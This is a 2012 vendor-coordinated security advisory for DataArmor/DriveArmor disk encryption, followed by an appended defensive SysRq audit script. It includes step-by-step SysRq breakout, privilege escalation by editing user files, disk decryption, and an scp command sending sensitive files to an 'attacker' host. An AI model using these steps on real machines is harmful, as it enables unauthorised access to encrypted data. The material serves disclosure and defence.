DataArmor / DriveArmor Privilege Escalation / Decryption
Posted Nov 30, 2012
Authored by Stuart Passe | Site ngssoftware.com

DataArmor and DriveArmor versions prior to 3.0.12.861 suffer from restricted environment breakout, privilege escalation, and full disk decryption vulnerabilities.

tags | exploit, vulnerability
MD5 | 0419d05b8467d22e94ea40d4bec34572

=======
Summary
=======
Name: DataArmor Full Disk Encryption - Restricted Environment breakout, Privilege Escalation and Full Disk Decryption
Release Date: 30 November 2012
Reference: NGS00193
Discoverer: Stuart Passe <stuart.passe@ngssecure.com>
Vendor: Mobile Armor
Vendor Reference: KB #1060043
Systems Affected: All versions of DataArmor and DriveArmor prior to v3.0.12.861
Risk: Critical
Status: Published

========
TimeLine
========
Discovered: 10 January 2012
Released: 17 January 2012
Approved: 17 January 2012
Reported: 17 January 2012
Fixed: 23 January 2012
Published: 30 November 2012

===========
Description
===========
The Mobile Armor DataArmor Full Disk Encryption platform allows users to fully encrypt hard drives utilising centralised security policy management.

An issue exists whereby it is possible for unauthenticated users to break out from the restricted DataArmor environment, providing unrestricted administrative access to the underlying platform and associated configuration files.

This allows users to arbitrarily modify both the platform and associated configuration files. Authentication credentials can then be added and/or generated, providing the ability to escalate privileges and gain full access to data stored on the encrypted partition.

=================
Technical Details
=================
The DataArmor software appears to be running under a restricted Linux X11 environment, configured to grab all keystrokes so that special key combinations which might normally be accepted by a Linux Kernel (such as "reboot" [Ctrl+Alt+Del] or "switch TTY" [Ctrl+Alt+{F1-F12}]) are discarded and not acted upon by the underlying Operating System.

It is possible to bypass this keystroke grabbing through use of the SysRq key, which allows special commands to be sent directly to the Linux Kernel and a break out from the DataArmor environment into the underlying Linux BusyBox Operating System. This exposes the running DataArmor environment to full manipulation by any user with physical access to the machine, and lets an unauthorised user recover files from, or fully decrypt, the hard disk.

Technical Details (Proof of Concept)
====================================

Restricted Environment Breakout
-------------------------------
Note: The "SysRq" key is usually located near the "Print Screen" key. On some laptops "SysRq" is accessible only by pressing "Fn". In this case the combination is a bit trickier: hold "Alt", hold "Fn", hold "SysRq", release "Fn", press key.

1. Power on laptop and allow DataArmor software to present authentication screen
2. Send the SIGTERM signal to all processes except init (Alt+SysRq+e), which results in a blank screen being displayed
3. Switch to TTY2 (Ctrl+Alt+F2), which will display a cursor
4. Send the SIGKILL signal to all processes except init (Alt+SysRq+i), which will display the following prompt
5. Press "Return" to activate shell as root
6. Verify that shell is obtained
7. Open an additional TTY (Ctrl+Alt+F3) and press "Return"
8. Verify that the DataArmor "MAAuthenticate" software is not running (ps)
9. Switch back to TTY2 (Ctrl+Alt+F2)
10. Reinitialise the X11 environment (startx)
11. Allow the DataArmor software to fully load
12. Switch the keyboard from RAW mode to XLATE mode (Alt+SysRq+r) to disconnect keyboard from X11 keystroke grabbing
13. Switch back to the additional TTY3 (Ctrl+Alt+F3)
14. Check in the process list that DataArmor is fully running (ps)

At this stage, it is possible to manipulate the DataArmor environment as we wish, allowing for potential full compromise of the laptop and encrypted data. We can view all current local users and hashes (cat /etc/Source/MAData.xml) for offline password-cracking, as well as view and modify the local security policy (cat /etc/Source/PolicyFile.xml). This can, however, be taken a stage further. Beyond viewing the contents of these files, the DataArmor software re-reads them each time an authentication attempt is made, so a user can modify the files within the XFS /etc partition and have the software act accordingly (for example, modifying the policy to prevent data erase and lockouts after failed password attempts, or changing the authentication method to a local file containing hashes). The following can be performed after step 13 above, with the DataArmor software fully running.

Add User or Escalate Privileges
-------------------------------
Note: Whilst the privilege escalation vulnerability has been proven successfully within the test environment, the ability to add users has not been fully tested at this stage due to uncertainty about the method of hash generation. This is purely a time limitation caused by short-term access to a DataArmor-enabled laptop, and could be overcome with more time for reverse engineering.

1. Navigate to the directory containing configuration files (cd /etc/Source)
2. Open the users file for editing (vi MAData.xml)
3. Add new user and associated hashes to file, making sure to write file (:wq)
4. Alternatively if credentials are known for a standard non-administrative user, edit the file and change the UserType to "1" to escalate privileges to an Administrator (<UserType>1</UserType>)
5. Return to the DataArmor screen running on TTY1 (Ctrl+Alt+F1)
6. Enter new/modified credentials into authentication box
7. Successful authentication presents the user with an additional option to access the Recovery Console (an administrative function)
8. This console gives the user free access to administrative functionality
9. This subsequently allows the user to recover sensitive files from the encrypted partition (such as Windows SAM files and user documents) and transfer them to external media such as a USB stick
10. Alternatively the user can fully decrypt the hard disk, at which point standard techniques for extracting data from the hard disk are applicable

Import/Export DataArmor Environment
-----------------------------------
Alongside fully compromising the running system through modification, the built-in networking capabilities of the Linux BusyBox Operating System mean that all platform files can potentially be moved from the local install to a secondary machine, or vice versa. This allows the sensitive files to be extracted for offline analysis (and potential cracking) in order to gain access to the laptop with existing user credentials. Because files can also be transferred back, important libraries and executables may be modified on an attacker's machine and then uploaded to the "victim" laptop, potentially bypassing the encryption altogether or enabling further malicious actions such as logging keystrokes and sending them over the network to the attacker in order to capture valid credentials.

1. Switch the keyboard from RAW mode to XLATE mode (Alt+SysRq+r) to disconnect keyboard from X11 keystroke grabbing
2. Switch back to the additional TTY3 (Ctrl+Alt+F3)
3. Verify the currently running iptables ruleset (iptables -L)
4. Change the default rules from "DROP" to "ACCEPT" to allow full network access (vi /etc/iptables.conf)
5. Load modified iptables ruleset (iptables-restore < /etc/iptables.conf)
6. The presence of ssh and scp within the DataArmor environment allows for transferring files either from the victim (scp /etc/Source/sensitive_files attacker@192.168.0.1:/tmp/) or to the victim machine (scp attacker@192.168.0.1:/tmp/modified_files /etc/Source/)

===============
Fix Information
===============
An updated version of the software has been released to address these vulnerabilities:
http://esupport.trendmicro.com/solution/en-us/1060043.aspx


SysRq can be disabled whilst the kernel is running, either by setting a sysctl parameter (kernel.sysrq = 0) or by writing directly to the /proc filesystem (echo "0" > /proc/sys/kernel/sysrq). However, there is a short period during the boot process, before the contents of the configuration files are applied, in which the kernel is still vulnerable.

Due to this small window of vulnerability, the preferred option is to re-compile the Linux Kernel. The SysRq key combination is compiled into most modern Linux Kernels by default; to disable it fully, the relevant option (CONFIG_MAGIC_SYSRQ) must be explicitly turned off when the Linux Kernel is compiled.

Additionally, consideration should be given to stripping down the Linux BusyBox environment in order to remove any unnecessary functionality such as the shell and associated administrative tools (sh, bash, strace, ssh, scp, etc.).
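As an added example (not part of the advisory or the vendor's fix), a POSIX shell audit that decodes the kernel.sysrq bitmask defined in the kernel's sysrq.txt and flags the two function groups the breakout above depends on: keyboard control (Alt+SysRq+r) and process signalling (Alt+SysRq+e / +i). The bit values come from the kernel documentation; the /proc and /boot paths are assumed to be those of a standard Linux host.

```shell
#!/bin/sh
# sysrq_audit.sh: decode kernel.sysrq and report which magic SysRq groups
# are live. Bit values per Documentation/sysrq.txt: 2 loglevel, 4 keyboard
# (SAK, unraw), 8 process debug dumps, 16 sync, 32 remount-ro, 64 signal
# processes (term/kill/oom), 128 reboot/poweroff, 256 nice RT tasks.
# A value of 1 means "all groups", 0 means fully disabled.

# Print a comma-separated list of enabled groups for a kernel.sysrq value.
sysrq_decode() {
    v=$1
    if [ "$v" -eq 0 ]; then echo "none"; return 0; fi
    if [ "$v" -eq 1 ]; then v=510; fi   # 1 == every bit set (2..256)
    out=""
    for pair in 2:loglevel 4:keyboard 8:debug 16:sync 32:remount-ro \
                64:signal 128:reboot 256:nice-rt; do
        bit=${pair%%:*}; name=${pair#*:}
        if [ $(( v & bit )) -ne 0 ]; then
            out="${out:+$out,}$name"
        fi
    done
    echo "$out"
}

# Succeed (exit 0) when the keyboard (4) or signal (64) group is enabled,
# i.e. the groups the restricted-environment breakout relies on.
sysrq_risky() {
    v=$1
    if [ "$v" -eq 1 ]; then v=510; fi
    [ $(( v & 68 )) -ne 0 ]
}

# Inspect the running host: live sysctl value plus the build-time option.
sysrq_audit() {
    if [ -r /proc/sys/kernel/sysrq ]; then
        cur=$(cat /proc/sys/kernel/sysrq)
        echo "kernel.sysrq=$cur -> enabled: $(sysrq_decode "$cur")"
        if sysrq_risky "$cur"; then
            echo "WARNING: keyboard/signal SysRq groups active; set kernel.sysrq=0"
        fi
    else
        echo "no /proc/sys/kernel/sysrq (SysRq not compiled in, or /proc absent)"
    fi
    cfg="/boot/config-$(uname -r)"   # assumed location of the kernel config
    if [ -r "$cfg" ]; then
        grep -E '^CONFIG_MAGIC_SYSRQ(_DEFAULT_ENABLE)?=' "$cfg" \
            || echo "CONFIG_MAGIC_SYSRQ not set in $cfg"
    fi
}
```

Run `sysrq_audit` on the image under review; a clean result is `kernel.sysrq=0` at runtime and `CONFIG_MAGIC_SYSRQ` absent from the build config, which closes the boot-time window the fix text describes.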

Wikipedia "Magic SysRq Key" - http://en.wikipedia.org/wiki/Magic_SysRq_key
Linux Kernel Documentation - http://kernel.org/doc/Documentation/sysrq.txt
The Linux Documentation Project - http://tldp.org/HOWTO/Remote-Serial-Console-HOWTO/security-sysrq.html

NCC Group Research
http://www.nccgroup.com/research
